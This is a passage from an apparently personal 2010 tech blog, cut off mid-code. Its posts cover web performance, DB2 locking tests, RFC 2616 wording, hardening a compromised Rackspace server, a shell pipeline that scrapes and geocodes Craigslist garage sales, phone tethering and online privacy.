This having been said, sometimes there are things that are just plain slow. Answering questions like "calculate the price for all 2 million products we sell in the north american market and present the top 10 with at least 50 in stock at a Distribution center within 50 miles" can often take some time. Couple these complex business rules with rich and powerful user interfaces and you have a potential for slowness to silently creep into your application. Digging through a few of the more modern javascript libraries, there are a number of strategies to combat this. We'll use the jquery datatable to illustrate some simple speedups that might apply.

For our situation, let's pretend the above mentioned query takes 500ms and the time to actually render the html for the rest of the page takes 500ms (until document ready). There are three general ways to get your front-end widget to initialize. In the interest of simplifying things, we're going to assume outside factors (like network congestion, server availability, etc) are not influencing our decision.

method 1 - put the data in the html/dom

This is often the simplest way and has the added benefit of degrading gracefully when a user has a browser that doesn't have javascript enabled. The down side is that the trivial implementation will generally require the sum of the two times in order to complete (read: 1 second).

method 2 - put the data as an ajason request (not ajax, because who uses xml on the web any more?)

This has the benefit of enabling the server to send back the core html (500ms) and THEN fetch the rest of the page. This means the user has SOME content in 500ms, and instead of staring at nothing (or the old page) for 1 second, they see SOMETHING in 500ms. This has the downside of actually requiring the same amount of time (if not more) than the above method. The biggest benefit is that it CAN make the system seem more responsive.

method 3 - put the data as a javascript include

OK, this one is a little whacky, but can make things even faster than either of the two above. In this method, instead of wiring the data into an xmlhttp request that is fetched after the DOM is loaded, you put a link in the document (probably the head) that points to a dynamically generated javascript file that will wire the content into the dom as soon as the required parent element shows up. This has the advantage of allowing the fetch of the data to proceed BEFORE the dom has fully loaded. In practice, this starts to become more performant when you have larger documents with complicated controls and markup in them.
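
Structurally the page ends up looking something like this (the script name is hypothetical; the server generates that file per request):

<head>
  <!-- fetched in parallel while the rest of the page is still streaming in;
       the generated script injects the table rows as soon as #top10 exists -->
  <script type="text/javascript" src="/reports/top10-data.js"></script>
</head>
<body>
  <table id="top10"></table>
</body>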

I don't necessarily recommend this approach as a defacto starting point. Before going down this path, you should make sure you've done the following:
  • minify and consolidate all your css and js
  • consolidate and pack all your images
  • use a cdn or edge server for static assets and content
  • properly set cache-control headers and use etags where appropriate

Don't start with this approach, but it is certainly a way to squeeze a little more performance out of your user interface.

Wednesday, October 6, 2010

Amazon EC2 versus rackspace cloud hosting

I recently needed to stand up a DB2 server and was going to reach for my trusty rackspace account, but didn't feel like setting up DB2 for an experiment that would only last a few hours.

Instead I turned to amazon. It turns out that amazon has preconfigured images for ubuntu/db2 that you can spin up almost instantaneously. In addition, their security model is a little more robust. Key things they do right from a security perspective (compared to rackspace):

#1 They never send you a root password (via email or otherwise). You must generate a public/private key pair and download the key via https. Assuming you keep your secret key secure, there is minimal (if any) opportunity for someone to steal this key. Even if they hack your amazon account, I'm not sure they could get to your server immediately, even though they certainly could shut it down.

#2 By default you are behind a firewall so that only a minimal set of tcp ports are even open. You need to actually take action before they will allow ssh access to the server.

#3 The root account is locked and cannot log in from a remote location. You MUST log in via a "normal" user (ubuntu on this image) and then switch to root.

All told, it seems like EC2 has got a more secure default setup than Rackspace. I haven't yet compared pricing or service levels on the two, but purely from a security perspective, AWS certainly has got its stuff together.

Monday, October 4, 2010

db2 locking and MVCC

I had an interesting discussion about locking in db2 a while back. It was interesting because it challenged some long held assumptions I had about db2 and how it handles locking. As usual, when I started digging deeper it turned out to be much more complicated than it would seem on the surface.

First off, some background: I was having a conversation with a colleague about locking in various DBMS's and I made the statement that DB2 doesn't support MVCC. Thus, I contended, it is not possible for someone to read the previous version of a row that I have updated while I'm in a transaction that has altered it. At this point the fellow I was talking to looked at me as if I had just grown an arm out of my forehead. He stated (correctly, it turns out) that DB2 has supported this almost forever.

I was, however, VERY confident that I was correct and subsequently dug up the documentation. Oddly enough, the documentation seemed to support the notion that I was mistaken (gasp!). Well, at this point I HAD to get to the bottom of this.

So, I fired up an amazon ec2 instance with ubuntu and db2 9 udb and started my test.

First, I created a table
create tablespace test1
create table test (id integer)


Then fired up squirrel sql with two different connections turning off autocommit.
First I seeded some data:
insert into test values (1)
insert into test values (2)
commit
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
select * from test where id = 1

When I issued the second select, in my head it should have blocked until the first connection's update finished, but it came back immediately. So now I had to sit back and wonder: "Am I imagining this behavior?" When I stop to think about it, my position seems suspect no matter how you slice it.

So I reread the definitions of db2's lock levels http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ as well as some ways things can go haywire http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ and got thinking back to the situation that caused me to think this.

The key thing that I was missing is that this ONLY applies to readers, if I change the second statement to an update, it WILL block (by default). So for example, if we run THIS sequence:
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
update test set id = 100 where id = 2

The second update will wait for the first one to finish. By comparison, in an MVCC database a reader can continue to operate with the version of the row as it was when its transaction began; even there, though, two writers updating the same row will queue up. This is the key thing that kept confusing me. DB2 treats readers and writers as unequal partners in the database instead of putting them on equal ground. While readers typically don't block, it's the writers that will cause problems.
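
The same experiment is easy to reproduce from jdbc (the driver class and URL are the usual type-4 suspects for db2 9; credentials and database are placeholders). The second update has to run on its own thread precisely because it blocks:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;

public class LockDemo {
    static final String URL = "jdbc:db2://localhost:50000/TESTDB"; // placeholder

    public static void main(String[] args) throws Exception {
        Class.forName("com.ibm.db2.jcc.DB2Driver");
        final Connection c1 = DriverManager.getConnection(URL, "user", "pass");
        final Connection c2 = DriverManager.getConnection(URL, "user", "pass");
        c1.setAutoCommit(false);
        c2.setAutoCommit(false);

        Statement s1 = c1.createStatement();
        s1.executeUpdate("update test set id = 12 where id = 2"); // c1 now holds a row lock

        Thread writer2 = new Thread(new Runnable() {
            public void run() {
                try {
                    Statement s2 = c2.createStatement();
                    // Blocks here until c1 commits or rolls back.
                    s2.executeUpdate("update test set id = 100 where id = 2");
                    System.out.println("second update finally ran");
                    c2.rollback();
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        });
        writer2.start();

        Thread.sleep(5000); // watch the second writer sit and wait...
        c1.rollback();      // ...until we release the lock
        writer2.join();
        c1.close();
        c2.close();
    }
}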

In all honesty, it sounds like there IS a setting in newer versions of db2 to enable MVCC-like behavior (the "currently committed" semantics in db2 9.7), but it is NOT the default. In addition, there is certainly overhead to maintaining versions of data just to keep readers and writers running concurrently. Certainly for read intensive operations, it might not be worth the overhead.

For a nice article, take a peek here: http://www.rtcmagazine.com/articles/view/101612

Mike.

Saturday, October 2, 2010

HTTP 1.1, rfc 2616 and reading comprehension

I've read with interest some documentation from Microsoft about how the HTTP 1.1 specification mandates some behavior. To Quote:
WinInet limits connections to a single HTTP 1.0 server to four simultaneous connections. Connections to a single HTTP 1.1 server are limited to two simultaneous connections. The HTTP 1.1 specification (RFC2616) mandates the two-connection limit.

This seems to be saying that browsers are only allowed (via some mythical mandate) to use two connections per server and any connections past two must block. After reading through the http 1.1 specification (again) I'm troubled that many folks have seriously misinterpreted this requirement. This is especially troubling because the manner in which RFCs are written is VERY explicit and it is (for me) really easy to understand the difference between a requirement and a recommendation. What is even more troubling is that people quote the microsoft reinterpretation of the specification as if it is a direct quote of the specification.

So for my example, the top of RFC 2616 states:
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in RFC 2119 [34].

If we chase down RFC 2119

1. MUST This word, or the terms "REQUIRED" or "SHALL", mean that the
definition is an absolute requirement of the specification.

2. MUST NOT This phrase, or the phrase "SHALL NOT", mean that the
definition is an absolute prohibition of the specification.

3. SHOULD This word, or the adjective "RECOMMENDED", mean that there
may exist valid reasons in particular circumstances to ignore a
particular item, but the full implications must be understood and
carefully weighed before choosing a different course.

4. SHOULD NOT This phrase, or the phrase "NOT RECOMMENDED" mean that
there may exist valid reasons in particular circumstances when the
particular behavior is acceptable or even useful, but the full
implications should be understood and the case carefully weighed
before implementing any behavior described with this label.

Then in the http spec we see:
Clients that use persistent connections SHOULD limit the number of simultaneous connections that they maintain to a given server. A single-user client SHOULD NOT maintain more than 2 connections with any server or proxy. A proxy SHOULD use up to 2*N connections to another server or proxy, where N is the number of simultaneously active users. These guidelines are intended to improve HTTP response times and avoid congestion.
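
Note the "SHOULD NOT": per the RFC 2119 definitions above, that is a recommendation a client may ignore for good reason, not a rule the server enforces. Nothing on the wire stops a client from opening more connections, which is easy to demonstrate (a sketch; point it at a server you control):

import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class ConnectionLimitDemo {
    public static void main(String[] args) {
        // Four simultaneous connections to the same server. The server happily
        // accepts them all, because the two-connection limit is client-side
        // policy, not protocol enforcement.
        for (int i = 0; i < 4; i++) {
            final int n = i;
            new Thread(new Runnable() {
                public void run() {
                    try {
                        URL url = new URL("http://example.com/"); // placeholder
                        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
                        InputStream in = conn.getInputStream();
                        System.out.println("connection " + n + ": " + conn.getResponseCode());
                        in.close();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            }).start();
        }
    }
}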


What's my problem?
  • If someone has taken the time to formally define things in a certain context, it is professionally irresponsible to change the meaning of their statements.
  • If you are distributing technical documentation, make sure you have your facts right and use unambiguous language. Remember, not everyone speaks English as their native language, nor do they necessarily have the inclination to go chase down quoted sources.
  • If you are trying to cite documentation, chase down the originator, don't rely on second, third, fourth, or nth parties to give you your information unless you REALLY trust them

Let's dissect a portion of the original quote:

Connections to a single HTTP 1.1 server are limited to two simultaneous connections.

Which of the following statements does this concretely assert?
  • An HTTP server will not accept more than two simultaneous connections.
  • An HTTP server might accept only two connections or might accept more
  • Clients can not make more than two simultaneous connections to the same server
  • Clients can actually make more than two simultaneous connections, but we've limited them to two

For the lay person (other than perhaps lawyers), these distinctions probably seem like minute and petty semantic wrangling. For professional software developers they are, however, terribly important.

Why? Because computers don't exactly do what you want them to do, they do exactly what you tell them to do.

Reread that a couple of times please...

Any subjective interpretation you are expecting the computer to do on your behalf does NOT happen, and anybody who's used a computer has probably run into problems where the computer is not doing what you want and you are unable to understand why. There are millions of lines of code you are interacting with, and their behavior is often specified with ambiguous language like the original paragraph. More importantly, they are restated and modified via the "telephone game" effect such that the original requirements are completely lost.

Monday, August 16, 2010

Secure your rackspace cloud server

OK, so I've gone round and round trying to figure out how my rackspace server was compromised and have come to the conclusion it was an inside job, but nobody's fessing up. I can see what sort of package was used to compromise my box and I may come back to trying to poison that package, but there isn't enough time in my life to continue to school folks who are hell bent on screwing with other people's property.

Instead, I'll give folks a quick primer on how to have a little better security if you choose to use rackspace with ubuntu 10.04.

#1 Make sure your rackspace console password is secure... some basic rules: 10 chars, no dictionary words, upper and lower case letters, 2 numbers, at least one special char.
#2 Once you get your root password emailed to you, log in via the secure console, and disable both network interfaces. I'm not sure what the 10.* interface is for, I'll figure that out later, but I'm assuming it's some sort of rackspace backchannel.
#3 Change the root password to something secure (NOT your console password).
#4 Disable root login via ssh (see the snippet after this list)
#5 reenable networking.
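
For #4, the change is a single line in /etc/ssh/sshd_config (standard openssh on ubuntu 10.04):

PermitRootLogin no

Then bounce sshd so it takes effect (from the console session, as root):

/etc/init.d/ssh restart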

At a minimum, someone must now guess a user account, a user password, AND the root password to get root access to your machine (assuming you don't do something really stupid like installing a random linux rootkit because your "friend" said it was kewl warez).

This should get you to a reasonably safe place to start with.

Note, if you want to ssh directly to your box, create a new user account (with a secure password) and you can do direct ssh and still be fairly secure. Adding the user to sudoers has the effect of giving root with 1 password (although it is theoretically still more secure if you have a difficult to guess userid).

Saturday, August 7, 2010

Cloud Computing Gotchas part II

I finally had time to sit down and actually analyze what happened to my box. It was certainly compromised by a script kiddie, but I'm not 100% sure if it was an inside job or not. In any event, I stored off the broken image and re-imaged the machine back to my "last known good" configuration.

I subsequently added the account that I thought was used for the attack setting the password back to what it was when the machine was originally compromised, but limited login to the rssh shell. This has been running for almost a week with no problems now. I've had a couple of sniffs of folks trying to connect to my machine as root, but no solid hits.

Some initial observations:

First, the default install of Ubuntu Server on rackspace's cloud accounts enables root login via ssh. This is very strange now that I think about it. Ubuntu by default disallows this (for very good reasons), and I think rackspace should seriously consider a change to their default build.

Second, the root password is emailed to customers. Again, really bad idea, not only is email really insecure, but there is certainly a more convenient method. Only display the password on the ssl admin console and push the responsibility of maintaining a good password policy to the customer.

Third, not only should the root account ssh login be disabled by default, but users should have an option to have the initial boot of the system start with the network interfaces disabled. I really would like to build a secure image, but it's nearly impossible when the server is started with network interfaces enabled.

So at this point, Rackspace's cloud accounts are exposing their customers to multiple attack vectors with zero chance of allowing the customer to secure their machine BEFORE an attacker has already breached their system. These are actually pretty minor changes to policy and configuration that have serious implications for security.

Saturday, July 31, 2010

Cloud Computing Gotchas

I've been using Rackspace cloud for testing some server builds and ESB solutions and recently ran into a "gotcha". First off, it looks like maybe the machine was compromised... I HOPE it was an inside job by one of my developer "friends" who happened to know the userid/password. If not, that means the default install of ubuntu 10.04, apache tomcat6, apache2.2, and servicemix can be compromised in less than 3 days when left out on the internet.

In any event, that particular problem notwithstanding, I now have a different problem... That is, rackspace has suspended my account and I cannot access my server, nor create another one, until Monday. Thank god I was only using this machine to test things; I can't imagine what I would have done if I was actually depending on it to be running.

Another problem I'm finding is that I cannot find any reference on Rackspace's web site about acceptable use. They suspended the account for outbound ssh activity which is pretty silly considering any sane server admin uses ssh for EVERYTHING. I'm a little concerned because without ssh capability, I don't really have a good secure option to connect to any other server.

Worse yet, I cannot access my log files, server images, or any other information to try and discover what happened. While they claim "fanatical customer service", I'm a bit disappointed that I have to wait 48 hours to get information about a problem with legal implications. It seems like it would be pretty simple to let me see at LEAST my log files, as well as get some information about WHO thinks I'm hacking. As it stands, it sounds like all anyone needs to do is call Rackspace and complain and they will disable an account.

Wish me luck on Monday, I'm really curious about what actually happened here.

Sunday, July 18, 2010

garage sales part two (geocoding and rendering)

Early Results

Here are some early results:

Port Huron, MI
Rockford, IL

These maps show the first page of garage sales on craigslist with about a 50% accuracy rate (meaning I can find an address only about half the time). That having been said, it's still pretty impressive, as manually entering these things into google maps is.... tedious. This process takes about 60 seconds per city using the script I've written.

Back to Geocoding

Note, geocoding is the process of attaching geographic coordinates to data. In my case I can find a "reasonable" address in about half of the entries. This means there is a string somewhere that looks like an address; notably, it has a few numbers and then a couple of words.

To get this data and geocode it, I wrote an awk script:
# rows where field 1 contains a parenthesized address like "(123 Some St)"
$1 ~ /\([0-9]+ .+\)/ {match($1,/([0-9]+ [^\)\(]+)\)/,out); printdata( "\""out[1]"\"")}
# otherwise, look for a "123 Two Words" pattern in field 2
$1 !~ /\([0-9]+ .+\)/ && $2 ~ /[0-9]+ [a-zA-Z]+ [a-zA-Z]+ /{match($2,/([0-9]+ [a-zA-Z]+ [a-zA-Z]+)/,out); printdata( "\""out[1]"\"")}
# geocode the address via google, extract lat/long with geocode.xsl,
# and re-emit the row with the coordinates appended
function printdata (mydata) {
curl = "/usr/bin/curl -s \"http://maps.google.com/maps/api/geocode/xml?address=" gensub(" ","%20","g",substr(mydata,2,length(mydata)-2)) ",+Port+Huron,+MI&sensor=false\" | /usr/bin/xmlstarlet tr geocode.xsl"
curl | getline loc
markers = markers "|" loc
close(curl)
print mydata",\""gensub("\"","\"\"","g",$2)"\","loc
}

What this script does is use a regular expression match to find rows in the data that look like addresses, replace the spaces with %20, send a geocoding request to http://maps.google.com/maps/api/geocode/xml, take the xml results and use an xslt to extract the latitude/longitude coordinates, then re-output the rows with the latitude and longitude tacked on the end.
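If you want to see the geocoding step by itself, here's roughly the same call done by hand for one address. I'm using an xmlstarlet sel expression as a stand-in for geocode.xsl (which I haven't shown), assuming the GeocodeResponse/result/geometry/location layout google returns:

/usr/bin/curl -s "http://maps.google.com/maps/api/geocode/xml?address=603%20N%203RD%20ST,+Port+Huron,+MI&sensor=false" | xmlstarlet sel -t -v "concat(//geometry/location/lat,',',//geometry/location/lng)"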

What I'm left with in my output2.csv file is some data that looks like this:

name,description,latitude,longitude
"603 N 3RD ST, ST CLAIR","Yard Garage Estate Sale....July 8 Thursday to July 11 Sunday...9AM to 6PM....We have Antiques, Tools, Furniture, Tons of stuff for EVERYONE...We plan on having a BAG SALE on Sunday with whats left....But be there before then for best choices!!!!!",42.9741483,-82.4225020


As it turns out, google has an api that takes a file just like this and builds a nice little map. I post to this api and out comes a pretty map.
The final product:
Main shell script

#!/bin/bash
rm -f *.html
rm -f *.xml
rm output.csv
wget -q -O craig1.xml "http://porthuron.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"
hxwls craig1.xml | grep http.*\.html | wget -i -
for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; sleep 1s; done;
cat output.csv | gawk -F \",\" -f go.awk > output2.csv
curl -X POST -H "GData-Version: 2.0" -H "Content-type: text/csv" -H "Authorization: GoogleLogin auth=<secret key you get from google>" -H "Slug: port huron craigslist garage sales" --data-binary @output2.csv http://maps.google.com/maps/feeds/maps/default/full


Additional awk stuff

BEGIN { markers =""; print "name,description,latitude,longitude"}
$1 ~ /\([0-9]+ .+\)/ {match($1,/([0-9]+ [^\)\(]+)\)/,out); printdata( "\""out[1]"\"")}
$1 !~ /\([0-9]+ .+\)/ && $2 ~ /[0-9]+ [a-zA-Z]+ [a-zA-Z]+ /{match($2,/([0-9]+ [a-zA-Z]+ [a-zA-Z]+)/,out); printdata( "\""out[1]"\"")}
function printdata (mydata) {
curl = "/usr/bin/curl -s \"http://maps.google.com/maps/api/geocode/xml?address=" gensub(" ","%20","g",substr(mydata,2,length(mydata)-2)) ",+Port+Huron,+MI&sensor=false\" | /usr/bin/xmlstarlet tr geocode.xsl"
curl | getline loc
markers = markers "|" loc
close(curl)
print mydata",\""gensub("\"","\"\"","g",$2)"\","loc
}
#END {print markers}


Wrapup

One thing I'll note: while this certainly works, I've only met a few people who would be able to figure it out. I'm ultimately probably better off switching to Ruby/Python/Groovy at some point, but I wanted to get something working first.

Some of the problems I had with these tools were that they don't just "work"... for example, to fetch the url via groovy, I started with this code snippet:

def http = new groovyx.net.http.HTTPBuilder( 'http://rockford.craigslist.org' )
http.request( groovyx.net.http.Method.GET ) {
    uri.path = '/search/'
    uri.query = [ areaID:'223', subAreaID:'', query:'garage sale', catAbb:'sss' ]
    response.success = { resp, xml ->
        xml.responseData.results.each {
            println " ${it.titleNoFormatting} : ${it.visibleUrl}"
        }
    }
}


My first problem was that my classpath was somehow screwed up and I couldn't get this to compile. In addition, even when I did get it to work, it was much more complicated than the command line equivalent:

wget -q -O craig1.xml "http://porthuron.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"


Why would I want to write all the gobbledy-gook at the top (which adds NO value) when the bottom version just works? If I get energetic, I'll probably port this to groovy once I get it working better, as I believe that will be more compatible with my ultimate platform (android).

Saturday, July 17, 2010

Garage sale maps

The Backstory

My wife is an avid garage sailer. She finds garage sales she thinks have promise, then cruises by them to see if there is anything of interest. She is so accomplished at this that she routinely turns a profit by snagging things that folks didn't realize had resale value, and flipping them at local consignment shops. While this doesn't pay the bills, it DOES provide enough extra cash to actually have her garage sailing at least pay for itself with a little left over.

This is, however, not without its share of problems:

First, the postings online (or on paper) for garage sales are scattered to the four winds. At this point, craigslist.org is the hands down winner for quality and quantity of posts. Local newspapers/classifieds also have a good quantity, but the few sites I found on google geared toward this are suffering terribly from a strategic chicken and egg problem.

Second, while craigslist has a fairly high quality set of sales posted, it has no functionality to map them, so you're on your own. Our current process is to plug through each one, look at the address, plug the address into google maps (or the gps), then lather, rinse, repeat.

The Idea


Enter the programmer husband. I saw what she was doing and said "I can do better with some software". My ultimate vision was a location-aware android application that could tell you the nearest 5 garage sales that have "interesting" things, as well as an online application to solve the obvious traveling salesman problem. While getting to this (noble? foolish?) goal involves solving a huge number of other problems, without a good solution to the first two problems mentioned above, everything else is secondary.

In order to solve the "chicken and egg" problem, I simply told myself "she's using craigslist as her primary source of information". Problem solved... yes, she's probably missing hundreds if not thousands of sources of garage sales, but since she had already been using craigslist as the primary source, I couldn't see any reason to change that. As a small caveat, since we did need to do some interpretation of the data from CL, it turns out I had to build an intermediate data format anyway. This means the input data is pluggable and we aren't necessarily bound to CL as the sole source of information.

For the "mapping" problem, my initial reaction was to use google maps. I already happened to understand the web apis and it's fairly easy to use. While there may be a hundred other tools that might do the job, I didn't even really look for alternate solution.

The Build, Part 1


From a solution design perspective, I am not a big fan of boiling the ocean. This type of solution is really only a good idea if you're a consultant who is being paid to come up with a brilliant idea... it's not so good for a schmuck who's trying to build something useful.

To that end, I reached into my toolbox and asked myself "I know python, ruby, and java all have html processing tools, which should I use?". My initial guess was ruby; hpricot and rubyful soup are both very capable screen scraping/html processing tools and showed early promise. In practice, it took a few hours with both to get them working and they were just a bit clunkier than I was looking for.

After an hour or so, I switched to Python. The advantage python seemed to have was that the html/http stuff was built right in. I've used python and jython in the past for screen scraping mainframe systems and was actually kicking myself for not remembering this and using it as my first choice. My initial enthusiasm began to wane quickly as I realized the slightly odd way the CL pages were formatted made them difficult to process using the default HTML parser.

I then went to java (actually groovy) and made what I'll admit was an almost halfhearted attempt at the problem. By this point I was a bit disheartened because I had spent the better part of the day trying this stuff out, and every time I changed tools my IDE (eclipse) required a bunch of reconfiguration to get everything working properly. In addition, the package management and syntax of all these things were so radically different that I had to spend time googling and mentally changing gears to get started again.

At this point I took a break and didn't resume until the next weekend. The next weekend I took a totally different approach. Instead of relying on "programming" languages, I asked myself the question "what is the simplest possible way to get and extract this content?".

My answer: bash.

Enter Bash

When I sat back down the following week I realized that in my search for utility packages in various languages I had been struggling with a couple of problems. First off, the software in Ruby/Python/Groovy (RPG) was not really geared for text processing or html processing. They were more like swiss army knives where I could get Yet Another Plugin (YAP) to do what I wanted. Then in my head I heard the late night infomercial huckster say "But wait, there's more..."

What I had been ignoring is that while developing the RPG solutions, I was actually using command line utilities to verify the code was working properly. DOH!

So, simply put, I took my existing wget command line and used that to extract the html for the posts.

wget -q -O craig1.xml "http://rockford.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"


Then I walked the links with hxwls and pulled them down. While I know this could have been a one step process, I was using the intermediate files for troubleshooting.

hxwls craig1.xml | grep http.*\.html | wget -i -

At that point I had a set of html files on my drive that I was using to try and extract content. My first step was to change them into xml, then use an xslt to convert them into flat files.
html tidy seemed like a good choice for cleaning up the html:

tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes


Use xmlstarlet to do the xslt

xmlstarlet tr ripper.xsl


The ripper.xsl consisted of the following:


<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">"<xsl:value-of select="normalize-space(//h2)"/>","<xsl:for-each select="//div[@id='userbody']"><xsl:value-of select='normalize-space(text())'/>","<xsl:value-of select="normalize-space(following::text())"/></xsl:for-each>"
</xsl:template>
</xsl:stylesheet>



A little bit of sed to extract the posting id

sed 's/PostingID: //'



Put it all together:


for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; done;


At this point I was pretty satisfied with the resulting csv file. In a couple of hours I had a working solution that was simple (if a bit opaque). The output.csv had a posting id, a subject, and a bunch of textual data about the posting. It was ready to be imported to mysql, geocoded, or whatever else needed to happen.
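For example, getting it into mysql would be one more command; the database and table here are hypothetical (I never actually built them):

mysql --local-infile -u root -p garagesales -e "LOAD DATA LOCAL INFILE 'output.csv' INTO TABLE postings FIELDS TERMINATED BY ',' ENCLOSED BY '\"';"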

The entire program was two files: an xsl, and a bash script of just a few lines all pipelined together:


#!/bin/bash
wget -q -O craig1.xml "http://rockford.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"
hxwls craig1.xml | grep http.*\.html | wget -i -
for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; done;


In my Next Post, geocoding this info and building a map.


Examples of useless garage sale sites that will never succeed

Monday, June 28, 2010

tether droid eris to Ubuntu 10.04 machine

My internet service provider is a bit dicey and I occasionally need to be on the Internet even while they're figuring out how to reboot their remote router after losing connectivity. So I thought I would just tether my smartphone (Droid ERIS) to my computer. After a bit of searching, I came up with a couple of requirements.
  1. I didn't want to root my phone. While this is technically a cool thing to do, I just don't want to do that right now.
  2. I need to be able to connect natively to an Ubuntu linux machine. All my computers are currently running ubuntu and I didn't want to screw around with wine or a virtual machine.

Enter easytether. In 5 minutes I had internet connectivity... here's what I did:
  1. downloaded easytether
  2. downloaded the ubuntu driver to the phone
  3. connected the phone to the computer (via usb)
  4. installed the .deb located in phone's download folder
  5. ran easytether on the phone
  6. ran "easytether enumerate" on my computer
  7. ran "sudo dhclient easytether0" on my computer


I'm impressed! What's more telling (aside from this just working) is that there is not yet a Mac version, but there is both a 32 and a 64 bit Ubuntu package. It makes me wonder exactly how many Ubuntu users there really are and how long until it surpasses the Mac market.

Speed results:
Last Result:
Download Speed: 674 kbps (84.3 KB/sec transfer rate)
Upload Speed: 635 kbps (79.4 KB/sec transfer rate)

Sunday, June 27, 2010

My verizon bill

Here's a copy of my verizon bill:
[screenshot: my Verizon bill, showing a big $0 balance at the top]

My first reaction is "Hey, I don't owe anything"... However, from experience I think I DO, and I think it might be $127. Unfortunately, by putting a big $0 balance at the top, they pretty much guarantee people will stop reading and simply assume they don't owe anything.

I've called Verizon about this a few times, and two out of three times the person I talk to ALSO thinks that I don't owe anything. I then need to walk them through my billing history for 15 minutes before they realize I DO in fact owe something. Usually this happens after a supervisor gets involved and starts trying to explain complicated billing cycles and all sorts of things that neither I nor the CSR actually care to know anything about.

This is how NOT to design an online bill presentation screen: they've taken intimate knowledge about how their internal billing and accounting systems work and broadcast it all the way to the customer. In addition to frustration, this causes confusion and wasted time/money/effort.

On the plus side, I wonder how many millions of dollars per month verizon makes because confused customers try to pay their $0 bill and end up being late for the $127 they actually owe.

Saturday, June 19, 2010

What should I post online?

As a guy with a reputation of knowing something about computers, I often get hit up for tech advice from folks. Recently, a cousin of mine sent me a note asking about what sorts of things I post online and what I don't. Evidently he had been aware of a situation where kids used information from spokeo.com to commit crimes.

Personally, I think this is pretty interesting and a really good question. I say this because I think a lot of non-tech folks have not yet made the transition from "off line" to "online". Many technical people have already had to deal with this (often years ago), but many younger folks and/or non-technical people are just beginning to understand the implications of being truly "online". For example, here is a post from 7 years ago by some buffoon (that's me) who decided to post an off-topic friday afternoon 833r discussion. This will likely be available for a very very long time.

From my perspective, this is a pretty good example of how information wants to be free. That is, once you start putting information on the internet, you lose control of it. This means things on the internet (text, photos, videos) can be taken out of context and used for other purposes. In addition, depending on what you put out there, criminals might be able to gain enough information to do BAD things. In this particular situation (7 years ago), I was in our data center at one point and after I introduced myself this guy said "oh so YOU'RE Mike Mainguy". Evidently, because I was posting a lot of messages in user groups with my work email address, spammers were scanning the user groups and bombarding our domain with email to my account. At one point I believe I was told that my account was receiving more spam than any other account in the domain except for the CEO's.

As another example, suppose I had posted on facebook that I was going on vacation for 2 weeks. This would mean that anybody who searched facebook for vacation would potentially be able to see it. This would have the unintended side effect of telling every tech savvy criminal in the world that they had a golden opportunity to break into my house. If, prior to that, I had posted a facebook note about my new plasma TV, I'd have put myself into a potentially vulnerable situation.

Don't get me wrong, the internet is bringing the world together and this is a wonderful thing. Social networking and other new applications are enabling us to connect globally and interact across time and space in unimaginable ways. I obviously think that sharing information is a good thing and encourage everyone to get online and actively maintain an online presence. As with anything, however, there are unintended and potentially negative consequences. Folks with newly minted online identities simply need to think about how they present themselves online.

Personally, before posting online, I typically ask myself the following questions:
  • "Would I be ashamed if my mom saw this?"
  • "Could a criminal use this information to do something bad?"
  • "Would a future employer potentially use this against me?"
If I answer "Yes" to any of these questions, I typically don't post it. Obviously there are other considerations, but these three simple rules seem to serve me pretty well.

Sunday, June 13, 2010

Active Directory Authorization with Java

I have a situation where I need sub-groupings of users in Active Directory to manage who can see particular pieces of information. It turns out this is easy, but unintuitive. The important detail is that groups can be put inside other groups, and you can use the "member" and "memberOf" attributes to determine who is in which group. So suppose you have an OU in Active Directory called "OU=web,DC=mainguy,DC=org" and you create a group named "CN=Germany National Sales,OU=web,DC=mainguy,DC=org". From here, in Active Directory you can create any number of subgroups and put them in the parent group (under the same OU in our example, but that's not necessary).

At this point, you can dump users into any of the groups and segregate them into nested structures. With a little creativity you can use recursion to support deeper nesting (not necessarily a good thing) as well as a "deny/allow" capability (perhaps based on ou).
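As an aside, if you only need the flattened (transitive) answer and your domain is 2003 SP2 or newer, AD's LDAP_MATCHING_RULE_IN_CHAIN matching rule will walk the nesting for you server side. A rough ldapsearch sketch using the same server and group as the code below:

ldapsearch -H ldap://173.203.66.30:389 -x -D "maxplanck@mainguy.org" -W -b "OU=web,DC=mainguy,DC=org" "(memberOf:1.2.840.113556.1.4.1941:=CN=Germany National Sales,OU=web,DC=mainguy,DC=org)" cn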

In any event, here's the code that can get you started.


package org.mainguy;

import java.util.Hashtable;

import javax.naming.AuthenticationException;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.NamingException;
import javax.naming.directory.Attribute;
import javax.naming.directory.Attributes;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;
import javax.naming.ldap.Control;
import javax.naming.ldap.InitialLdapContext;
import javax.naming.ldap.LdapContext;

// Requests AD "fast bind" (OID 1.2.840.113556.1.4.1781, LDAP_SERVER_FAST_BIND_OID):
// the server skips building a full security token, so repeated bind attempts are cheap.
class FastBindConnectionControl implements Control {
 public byte[] getEncodedValue() {
